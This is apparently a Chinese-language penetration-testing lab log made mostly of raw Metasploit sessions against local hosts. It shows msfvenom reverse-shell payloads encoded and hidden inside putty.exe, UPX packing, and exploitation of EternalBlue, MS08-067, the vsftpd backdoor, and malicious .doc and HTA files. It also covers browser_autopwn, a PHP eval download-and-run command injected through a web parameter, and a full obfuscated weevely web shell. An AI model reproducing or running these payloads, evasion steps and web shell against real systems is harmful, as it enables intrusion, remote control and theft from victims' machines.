x86/shikata_ga_nai chosen with final size 624
Payload size: 624 bytes
Final size of exe file: 2661376 bytes
Saved as: payload1.exe将payload1.exe上传到windows下
# msfconsole
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] Sending stage (175686 bytes) to 192.168.0.106
[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.106:30805) at 2022-06-28 17:03:05 +0800
meterpreter > pwd
C:\Users\xiang\Desktop隐秘地启动一个攻击负载
msfvenom -a x86 --platform Windows -x ProcessExplorer/procexp.exe -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -x putty.exe -k -b '\x00\x0a\xff' -i 10 -f exe -o payload2.exe
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai succeeded with size 408 (iteration=1)
x86/shikata_ga_nai succeeded with size 435 (iteration=2)
x86/shikata_ga_nai succeeded with size 462 (iteration=3)
x86/shikata_ga_nai succeeded with size 489 (iteration=4)
x86/shikata_ga_nai succeeded with size 516 (iteration=5)
x86/shikata_ga_nai succeeded with size 543 (iteration=6)
x86/shikata_ga_nai succeeded with size 570 (iteration=7)
x86/shikata_ga_nai succeeded with size 597 (iteration=8)
x86/shikata_ga_nai succeeded with size 624 (iteration=9)
x86/shikata_ga_nai chosen with final size 624
Payload size: 624 bytes
Final size of exe file: 702464 bytes
Saved as: payload2.exe将payload2.exe上传到windows下
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] Sending stage (175686 bytes) to 192.168.0.158
[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.158:50055) at 2022-06-28 17:23:50 +0800
meterpreter >加壳
upx
#upx
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2020
UPX 3.96 Markus Oberhumer, Laszlo Molnar & John Reiser Jan 23rd 2020
Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..
Commands:
-1 compress faster -9 compress better
-d decompress -l list compressed file
-t test compressed file -V display version number
-h give more help -L display software license
Options:
-q be quiet -v be verbose
-oFILE write output to 'FILE'
-f force compression of suspicious files
-k keep backup files
file.. executables to (de)compress
Type 'upx --help' for more detailed help.
UPX comes with ABSOLUTELY NO WARRANTY; for details visit https://upx.github.io开始渗透
利用主机漏洞渗透
利用操作系统漏洞
Windows 7
msf6 > nmap -sT -A --script=smb-vuln-ms17-010 -P0 192.168.0.1/24
[*] exec: nmap -sT -A --script=smb-vuln-ms17-010 -P0 192.168.0.1/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-23 16:07 CST
Nmap scan report for 192.168.0.1
…
Nmap scan report for 192.168.0.158
…
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
…
msf6 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average YesMS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal YesMS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 greatYesSMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.0.158
rhost => 192.168.0.158
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] 192.168.0.158:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.0.158:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.0.158:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.0.158:445 - The target is vulnerable.
[*] 192.168.0.158:445 - Connecting to target for exploitation.
[+] 192.168.0.158:445 - Connection established for exploitation.
[+] 192.168.0.158:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.0.158:445 - CORE raw buffer dump (40 bytes)
[*] 192.168.0.158:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42 Windows 7 Home B
[*] 192.168.0.158:445 - 0x00000010 61 73 69 63 20 37 36 30 31 20 53 65 72 76 69 63 asic 7601 Servic
[*] 192.168.0.158:445 - 0x00000020 65 20 50 61 63 6b 20 31 e Pack 1
[+] 192.168.0.158:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.0.158:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.0.158:445 - Sending all but last fragment of exploit packet
[*] 192.168.0.158:445 - Starting non-paged pool grooming
[+] 192.168.0.158:445 - Sending SMBv2 buffers
[+] 192.168.0.158:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.0.158:445 - Sending final SMBv2 buffers.
[*] 192.168.0.158:445 - Sending last fragment of exploit packet!
[*] 192.168.0.158:445 - Receiving response from exploit packet
[+] 192.168.0.158:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.0.158:445 - Sending egg to corrupted connection.
[*] 192.168.0.158:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.0.158
[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.158:49667 ) at 2022-06-23 16:32:15 +0800
[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >Windows 2000
msf6> use exploit/windows/dcerpc/ms03_026_dcom
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(windows/dcerpc/ms03_026_dcom) > show targets
Exploit targets:
Id Name
-- ----
0 Windows NT SP3-6a/2000/XP/2003 Universal
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set payload windows/shell_bind_tcp
payload => windows/shell_bind_tcp
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set RHOST 192.168.0.170
RHOST => 192.168.0.170
msf6 exploit(windows/dcerpc/ms03_026_dcom) > run
[*] 192.168.0.170:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] 192.168.0.170:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.0.170[135] ...
[*] 192.168.0.170:135 - Calling DCOM RPC with payload (1648 bytes) ...
[*] Started bind TCP handler against 192.168.0.170:4444
[*] Command shell session 1 opened (192.168.0.150:34825 -> 192.168.0.170:4444) at 2022-07-21 15:40:55 +0800
Shell Banner:
Microsoft Windows 2000 [Version 5.00.2195]
-----
C:\WINNT\system32>利用木马
Windows 10、7、2003
msf> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf exploit/multi/handler> set lhost 192.168.0.150
lhost => 192.168.0.150
msf exploit/multi/handler> set lport 8888
lport => 8888
msf exploit/multi/handler> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit/multi/handler> run
[*] Started reverse TCP handler on 192.168.0.150:8888
[*] Sending stage (175686 bytes) to 192.168.0.106
[*] Meterpreter session 1 opened (192.168.0.150:8888 -> 192.168.0.106:3552) at 2022-07-21 11:02:24 +0800
meterpreter >利用客户端漏洞渗透
利用软件vsftpd 2.3.4
Linux
msf6 > nmap -sT -A -P0 192.168.0.161
msf6 exploit(windows/smb/ms08_067_netapi) > nmap -sT -A -P0 192.168.0.161
[*] exec: nmap -sT -A -P0 192.168.0.161
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-14 18:36 CST
Nmap scan report for 192.168.0.161
Host is up (0.00081s latency).
Not shown: 977 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.0.150
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_ssl-date: 2022-07-14T10:36:30+00:00; +6s from scanner time.
msf6 >search vsftpd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact
payload => cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.0.161
rhost => 192.168.0.161
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >exploit
[*] 192.168.0.161:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.0.161:21 - USER: 331 Please specify the password.
[+] 192.168.0.161:21 - Backdoor service has been spawned, handling...
[+] 192.168.0.161:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.0.150:35303 -> 192.168.0.161:6200) at 2022-07-14 18:41:26 +0800暴力猜测目标开放的端口
Windows 2000
mf6>use exploit/windows/smb/ms08_067_netapi
msf6 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp_allports
msf6 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.0.158
rhost => 192.168.0.158
msf6 exploit(windows/smb/ms08_067_netapi) > run
[*] Started reverse TCP handler on 192.168.0.150:1
[*] 192.168.0.158:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175686 bytes) to 192.168.0.158
[*] 192.168.0.158 - Meterpreter session 1 closed. Reason: Died
[-] Meterpreter session 1 is not valid and will be closed
192.168.0.158 windows 2000 自动关机使用msf.doc文件
Windows 2000 SP0/SP4 English
msf6 exploit(windows/browser/ms10_002_aurora) > use exploit/windows/fileformat/ms11_006_createsizeddibsection
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/ms11_006_createsizeddibsection) > info
Name: MS11-006 Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
Module: exploit/windows/fileformat/ms11_006_createsizeddibsection
Platform: Windows
Arch:
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Great
Disclosed: 2010-12-15
Provided by:
Moti & Xu Hao
Yaniv Miron aka Lament of ilhack
jduck
Available targets:
Id Name
-- ----
0 Automatic
1 Windows 2000 SP0/SP4 English
2 Windows XP SP3 English
3 Crash Target for Debugging
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.doc yes The file name.
Payload information:
Space: 512
Avoid: 1 characters
Description:
This module exploits a stack-based buffer overflow in the handling
of thumbnails within .MIC files and various Office documents. When
processing a thumbnail bitmap containing a negative 'biClrUsed'
value, a stack-based buffer overflow occurs. This leads to arbitrary
code execution. In order to trigger the vulnerable code, the folder
containing the document must be viewed using the "Thumbnails" view.
References:
https://nvd.nist.gov/vuln/detail/CVE-2010-3970
OSVDB (70263)
https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2011/MS11-006
http://www.securityfocus.com/bid/45662
msf6 exploit(windows/fileformat/ms11_006_createsizeddibsection) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(windows/fileformat/ms11_006_createsizeddibsection) > exploit
[*] Creating 'msf.doc' file ...
[+] msf.doc created at /root/.msf4/local/msf.doc
#cp /root/.msf4/local/msf.doc /home/jerry/复制msf.doc到windows下
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.0.150
lhost => 192.168.0.150
windows下打开msf.doc
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.0.150:8888
[*] Sending stage (175686 bytes) to 192.168.0.169
[*] Meterpreter session 2 opened (192.168.0.150:8888 -> 192.168.0.169:1487) at 2022-07-20 15:47:53 +0800使用HTA文件进行攻击
Windows 10、7
HTA文件解析程序
C:\Windows\System32\mshta.exe
HTA文件解析程序文件运行
demo.hta
<html>
<title>WEB安全测试实验</title>
<link
rel="stylesheet" type="text/css"
href="../css/style.css">
<head>
<meta
http-equiv="Content-Type" content="text/html;
charset=utf-8">
</head>
<body>
<h1>WEB 安全测试实验</h1>
</body>
</html>WEB 安全测试实验
直接运行
在浏览器中运行
开始攻击
#msfconsole
msf6 > use exploit/windows/fileformat/office_word_hta
msf6 exploit(windows/fileformat/office_word_hta) > show targets
Exploit targets:
Id Name
-- ----
0 Microsoft Office Word
msf6 exploit(windows/fileformat/office_word_hta) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.150:4444
msf6 exploit(windows/fileformat/office_word_hta) > [+] msf.doc stored at /home/jerry/.msf4/local/msf.doc
[*] Using URL: http://0.0.0.0:8080/default.hta
[*] Local IP: http://192.168.0.150:8080/default.hta
[*] Server started.
[*] Sending stage (175174 bytes) to 192.168.0.106
[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.106:8176 ) at 2022-06-16 16:27:50 +0800打开被攻击对象浏览器,输入http://192.168.0.150:8080/default.hta,直接运行或者保存default.hta再运行,被攻击成功。
msf6 exploit(windows/fileformat/office_word_hta) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ---------------------
1 meterpreter x86/windows DESKTOP-9A8VFKB\xiang @ DES 192.168.0.150:4444 -> 192.16
KTOP-9A8VFKB 8.0.106:8176 (192.168.0.106
)
msf6 exploit(windows/fileformat/office_word_hta) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > ls
Listing: C:\Users\xiang\Downloads
=================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 7185 fil 2022-06-16 16:26:27 +0800 default.hta
100666/rw-rw-rw- 282 fil 2021-04-27 15:13:52 +0800 desktop.ini
meterpreter > pwd
C:\Users\xiang\Downloads
meterpreter > getuid
Server username: DESKTOP-9A8VFKB\xiang利用浏览器插件:adobe flash进行攻击
没有成功,估计现在不支持adobe flash
#msfconsole
msf6 > search adobe_flash
msf6 > use 9
msf6 > use exploit/multi/browser/adobe_flash_hacking_team_uaf
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(multi/browser/adobe_flash_hacking_team_uaf) > run
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] Using URL: http://0.0.0.0:8080/y0dKYgEIkI2zc
[*] Local IP: http://192.168.0.150:8080/y0dKYgEIkI2zc
[*] Server started.服务器安装adobe flash play 17 Active,在浏览器输入:http://192.168.0.150:8080/y0dKYgEIkI2zc,就被激活
监测浏览器漏洞
利用browser_autopwn进行攻击
Windows 10、7、2003
msf6 auxiliary(server/browser_autopwn2) > use server/browser_autopwn
msf6 auxiliary(server/browser_autopwn) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 auxiliary(server/browser_autopwn) > run
[*] Auxiliary module running as background job 27.
msf6 auxiliary(server/browser_autopwn) >
[*] Setup
[*] Starting exploit modules on host 192.168.0.150...
[*] ---
[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/QOSlCDKP
[*] Local IP: http://192.168.0.150:8080/QOSlCDKP
[*] Server started.
[*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/LNRlnrxdQ
[*] Local IP: http://192.168.0.150:8080/LNRlnrxdQ
[*] Server started.
[*] Starting exploit multi/browser/firefox_tostring_console_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/SytDwnNLVJ
[*] Local IP: http://192.168.0.150:8080/SytDwnNLVJ
[*] Server started.
[*] Starting exploit multi/browser/firefox_webidl_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/XxbRZnvPzF
[*] Local IP: http://192.168.0.150:8080/XxbRZnvPzF
[*] Server started.
[*] Starting exploit multi/browser/java_atomicreferencearray with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/dIavmEmlsJvA
[*] Local IP: http://192.168.0.150:8080/dIavmEmlsJvA
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_jmxbean with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/FSRTIbVUWRDsU
[*] Local IP: http://192.168.0.150:8080/FSRTIbVUWRDsU
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_provider_skeleton with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/lIROBHwdaD
[*] Local IP: http://192.168.0.150:8080/lIROBHwdaD
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_reflection_types with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/pyJEvk
[*] Local IP: http://192.168.0.150:8080/pyJEvk
[*] Server started.
[*] Starting exploit multi/browser/java_rhino with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/huhYFRmk
[*] Local IP: http://192.168.0.150:8080/huhYFRmk
[*] Server started.
[*] Starting exploit multi/browser/java_verifier_field_access with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/jAzqekl
[*] Local IP: http://192.168.0.150:8080/jAzqekl
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/JCbqIs
[*] Local IP: http://192.168.0.150:8080/JCbqIs
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/cBiTChJAeCWA
[*] Local IP: http://192.168.0.150:8080/cBiTChJAeCWA
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/kRyiwct
[*] Local IP: http://192.168.0.150:8080/kRyiwct
[*] Server started.
[*] Starting exploit windows/browser/ie_cgenericelement_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/YYQeJjzuqe
[*] Local IP: http://192.168.0.150:8080/YYQeJjzuqe
[*] Server started.
…
[*] Using URL: http://0.0.0.0:8080/PdyJht6uQ
[*] Local IP: http://192.168.0.150:8080/PdyJht6uQ
[*] Server started.在被测浏览器中输入:http://192.168.0.150:8080/PdyJht6uQ 等
[*] 192.168.0.106ie_createobject - Sending exploit HTML...
[*] 192.168.0.106mozilla_nstreerange - Redirecting to .html URL
[*] 192.168.0.106mozilla_nstreerange - Sending HTML
[*] 192.168.0.106mozilla_nstreerange - Sending XUL
[-] 192.168.0.106msxml_get_definition_code_exec - 192.168.0.106:10064 - Browser not supported: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
[-] 192.168.0.106adobe_flash_rtmp - Browser not supported: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
[*] 192.168.0.106ie_cgenericelement_uaf - Requesting: /YYQeJjzuqe
[-] 192.168.0.106ie_cgenericelement_uaf - Browser not supported, sending 404: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Interrupt: use the 'exit' command to quit
msf6 auxiliary(server/browser_autopwn) > sessions -i
Active sessions
===============
No active sessions.利用browser_autopwn2进行攻击
Windows 2003
msf6 > use server/browser_autopwn2
msf6 auxiliary(server/browser_autopwn2) > run
[*] Auxiliary module running as background job 0.
[*] Searching BES exploits, please wait...
msf6 auxiliary(server/browser_autopwn2) > [*] Starting exploit modules...
[*] Starting listeners...
[*] Time spent: 31.071206468
[*] Using URL: http://0.0.0.0:8080/IqV4IRZ7Q85f
[*] Local IP: http://192.168.0.150:8080/IqV4IRZ7Q85f
[*] The following is a list of exploits that BrowserAutoPwn will consider using.
[*] Exploits with the highest ranking and newest will be tried first.
Exploits
========
Order Rank Name Payload
----- ---- ---- -------
1 Excellent firefox_webidl_injection firefox/shell_reverse_tcp on 4442
2 Excellent firefox_tostring_console_injection firefox/shell_reverse_tcp on 4442
3 Excellent firefox_svg_plugin firefox/shell_reverse_tcp on 4442
4 Excellent firefox_proto_crmfrequestfirefox/shell_reverse_tcp on 4442
5 Excellent webview_addjavascriptinterface android/meterpreter/reverse_tcp on 4443
6 Excellent samsung_knox_smdm_urlandroid/meterpreter/reverse_tcp on 4443
7 Great adobe_flash_worker_byte_array_uaf windows/meterpreter/reverse_tcp on 4444
8 Great adobe_flash_domain_memory_uafwindows/meterpreter/reverse_tcp on 4444
9 Great adobe_flash_copy_pixels_to_byte_arra windows/meterpreter/reverse_tcp on 4444
10 Great adobe_flash_casi32_int_overflow windows/meterpreter/reverse_tcp on 4444
11 Great adobe_flash_delete_range_tl_op osx/x86/shell_reverse_tcp on 4447
12 Great adobe_flash_uncompress_zlib_uaf windows/meterpreter/reverse_tcp on 4444
13 Great adobe_flash_shader_job_overflow windows/meterpreter/reverse_tcp on 4444
14 Great adobe_flash_shader_drawing_fill windows/meterpreter/reverse_tcp on 4444
15 Great adobe_flash_pixel_bender_bofwindows/meterpreter/reverse_tcp on 4444
16 Great adobe_flash_opaque_background_uaf windows/meterpreter/reverse_tcp on 4444
17 Great adobe_flash_net_connection_confusion windows/meterpreter/reverse_tcp on 4444
18 Great adobe_flash_nellymoser_bof windows/meterpreter/reverse_tcp on 4444
19 Great adobe_flash_hacking_team_uaf windows/meterpreter/reverse_tcp on 4444
20 Good wellintech_kingscada_kxclientdownloa windows/meterpreter/reverse_tcp on 44 44
21 Good ms14_064_ole_code_execution windows/meterpreter/reverse_tcp on 4444
[+] Please use the following URL for the browser attack:
[+] BrowserAutoPwn URL: http://192.168.0.150:8080/IqV4IRZ7Q85f
[*] Server started.在被测浏览器中输入:http://192.168.0.150:8080/IqV4IRZ7Q85f
[*] Gathering target information for 192.168.0.169
[*] Sending HTML response to 192.168.0.169
[*] 192.168.0.169 wellintech_kingscada_kxclientdownload - Requested: /PIJKiQZx/hqDDuX/
[*] 192.168.0.169 wellintech_kingscada_kxclientdownload - Sending KingScada kxClientDownload.ocx ActiveX Remote Code Execution
[*] 192.168.0.169 ms14_064_ole_code_execution - Sending exploit...
[*] 192.168.0.169 ms14_064_ole_code_execution - Sending VBS stager
[*] Sending stage (175686 bytes) to 192.168.0.169
[*] Meterpreter session 3 opened (192.168.0.150:4444 -> 192.168.0.169:1525) at 2022-07-20 17:36:45 +0800利用Web漏洞
Windows 10、7、2003、2000
http://192.168.0.160:8100/sec/17/example.php?cmd=是一个PHP命令注入漏洞
msf6 > use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > options
Module options (exploit/multi/script/web_delivery):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This
must be an address on the local machine or 0.0.0.0 to l
isten on all addresses.
SRVPORT 8080 yesThe local port to listen on.
SSL falsenoNegotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly g
enerated)
URIPATH noThe URI to use for this exploit (default is random)
Payload options (python/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOSTyes The listen address (an interface may be specified)
LPORT 4444 yesThe listen port
Exploit target:
Id Name
-- ----
0 Python
msf6 exploit(multi/script/web_delivery) > show targets
Exploit targets:
Id Name
-- ----
0 Python
1 PHP
2 PSH
3 Regsvr32
4 pubprn
5 SyncAppvPublishingServer
6 PSH (Binary)
7 Linux
8 Mac OS X
msf6 exploit(multi/script/web_delivery) > set target 1
target => 1
msf6 exploit(multi/script/web_delivery) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(multi/script/web_delivery) > set lport 8899
lport => 8888
msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.150:8899
[*] Using URL: http://0.0.0.0:8080/SPzNh9
msf6 exploit(multi/script/web_delivery) > [*] Local IP: http://192.168.0.150:8080/SPzNh9
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.0.150:8080/SPzNh9', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"
在浏览器中输入:http://192.168.0.160:8100/sec/17/example.php?cmd=php%20-d%20allow_url_fopen=true%20-r%20%22eval(file_get_contents(%27http://192.168.0.160:8080/SPzNh9%27,%20false,%20stream_context_create([%27ssl%27=%3E[%27verify_peer%27=%3Efalse,%27verify_peer_name%27=%3Efalse]])));%22
[*] 192.168.0.150 web_delivery - Delivering Payload (1114 bytes)
[*] Sending stage (39282 bytes) to 192.168.0.150
[*] Meterpreter session 1 opened (192.168.0.150:8899 -> 192.168.0.160:38676 ) at 2022-06-16 18:38:14 +0800
msf6 exploit(multi/script/web_delivery) > sessions
Active sessions
===============
Id Name TypeInformation Connection
-- ---- --------------- ----------
1 meterpreter php/linux www-data @ Jerry 192.168.0.150:8899 -> 192.168.0.150:38676 (192.168.0.150)
msf6 exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > dir
Listing: /var/www/html/sec/17
=============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100766/rwxrw-rw- 110 fil 2022-06-06 19:09:45 +0800 example.php
meterpreter > pwd
/var/www/html/sec/17
meterpreter > getuid
Server username: www-data利用Web系统进行远程控制
#weevely generate 123456 ./testweb.php
Generated './testweb.php' with password '123456' of 677 byte size.
testweb.php
<?php
$B='$k){hg$c=strlen($hgk)hg;$l=sthghgrlen($t);hg$o="";for($i=0hg;hg$i<$l;)hg{for($j=hg0;($jhghg<hg$chg&&$i<$l);$jhg++,$ih';< span=""></hg$chg&&$i<$l);$jhg++,$ih';<>
$c='=@ob_get_conthgentshg();@ob_hgend_clhgean();$r=hg@bashge64_enhgcodehg(@x(@hggzhgcompresshg($o),$k));prihgnt("$phg$khgh$r$kf");}';
$R=str_replace('R','','crReaRRte_fuRncRtRion');
$L='$k="ehg10hgahgdc3hg9";$kh="49ba5hg9abbe5hg6";$khgf="e057f20fhghg883e";$p="kRXhgw88VYFzhgEOYQOk"hghg;functihgon x($hgt,';
$I=':/hghg/inputhg"),hg$mhg)==1) {@ob_starhgt();@evahgl(@gzuncomhgpresshg(@x(@hgbashge64_decodhge($m[1]hg),$k)))hg;hghg$o';
$k='g++){$o.=$t{$i}^$k{$j}hg;}}rhgeturnhg $o;}ifhg hg(@prhgeg_match("/$khhg(.+)$kfhg/hg",@file_gethghg_conhgtents("php';
$J=str_replace('hg','',$L.$B.$k.$I.$c);
$h=$R('',$J);$h();
?># weevely http://192.168.0.106:8100/sec/19/testweb.php 123456
[+] weevely 4.0.1
[+] Target: 192.168.0.150:8100
[+] Session:/root/.weevely/sessions/192.168.0.150/testweb_0.session
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
weevely> help
:file_rmRemove remote file.
